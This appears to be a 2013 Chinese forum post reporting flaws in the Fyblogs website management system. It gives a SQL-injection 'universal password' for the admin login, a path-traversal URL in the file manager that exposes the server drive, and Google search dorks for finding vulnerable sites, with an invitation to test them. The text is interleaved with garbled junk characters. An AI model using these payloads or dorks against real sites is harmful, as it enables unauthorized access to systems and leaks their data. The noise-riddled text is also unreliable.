漏洞类型: 未授权访问/权限绕过
6 K2 m6 L! F, b5 P% L5 J% [! z# r6 ?. g% Y8 j1 a3 i R1 x# b* e
简要描述:
2 E" S1 F8 D% [5 Z1 i" ~6 L# y
. I: @7 u0 _" JFyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
1 \8 K e; L% v3 [. Q3 {) W
2 m9 L6 `, ^' N+ H- n, y1 b4 h) k详细说明:' c0 W$ ~- r4 m n
: w" y: x# \7 O' e) g1 U后台万能密码 'or'='or'+ H8 v& t1 H4 L0 s
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露! b8 O! \+ f- F
admin/uploadfile.asp?currentFolder=/upfiles/../( w. J8 R8 M s' x
5 C* e& C. D1 }. V
漏洞证明:4 w, h& @7 j/ C3 L4 G; N
' r6 t2 K& \5 O; o谷歌:inurl:type.asp?id=1 新闻中心: @' n6 \% a4 T4 v) d
或者 :inurl:download_ok.asp?" O7 o+ g7 B4 D1 c/ L$ |
4 S+ u E5 V, O7 B6 Z |: O
可以测试
w# e8 E- q) v4 E: Q% I) D( S
, o' C2 L. k* x, V2 A |
发表于 2013-3-7 13:07:46
收藏
支持
反对